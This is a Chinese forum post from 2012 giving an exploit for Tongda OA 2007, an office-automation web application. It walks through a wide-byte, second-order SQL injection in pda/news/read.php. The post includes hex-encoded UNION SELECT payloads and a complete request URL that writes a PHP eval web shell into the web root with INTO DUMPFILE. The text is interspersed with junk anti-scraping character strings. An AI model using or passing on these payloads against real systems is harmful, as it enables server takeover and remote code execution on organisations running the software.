找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2510|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
目前测试通达OA2007版本
% r: Q& v& e6 C: y9 A( ^. w0 W3 w. ]# }3 j2 F- X& l# Z& @: I9 N/ V

( |  N4 J, G/ Q) qOffice Anywhere 2007 网络智能办公系统4 I, ]$ [2 w! s* R% w( I, I
( {$ \4 i% j  F
http://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..
0 _8 S  A2 n1 @" g$ U+ J) E
( V* c" `0 _" f' r- Y' f/ w, J
* j2 \6 b4 ]$ ?- }8 N这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的  f4 u- I4 }2 {
+ y' @4 v' n0 Z" s5 ^2 |; Y
例如:SELECT * from USER where USER_ID='{$USERNAME}'  
# I# K; @+ F5 v7 [  r3 h其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
& \' [# z6 }( M  \' Y : S- i% w: S, y1 I
这个时候我们是不是可以组合起来使用哪?
' x; Y2 t8 _- H# k& U/ q/ x - A# Y# s8 h$ m4 F. D
第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样& N6 e  l& L& q! ~
union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
* w* F" q/ ^4 c/ E- f+ p
9 |: N8 v2 C8 o4 [# a+ z  u+ h! x这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了& D0 E7 P, S: r# l7 z6 s

: [1 z- L& ]( ~6 {5 l9 [8 S) P那么问题来了,单引号可以吗?当然是不可以的,^_^。。。
) e/ k9 k# r" R/ i6 I' u
$ l" p- b( |. C那么我们用字符串格式带入进行hex编码
2 }; S( v' \. k. E& W+ y
+ v) T0 F7 V, |%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23$ U- O" r. c1 S, O
3 f0 U% x, X5 L4 f
测试ok,获取oa的webshell: `# k% P8 e+ i4 ?) W$ \& C
% K# L* S" A0 Z; H/ f$ p
7 Z; H% k* {2 U7 G/ V
pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23, b- K) ^7 U( X* I, m
直接getwebshell
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表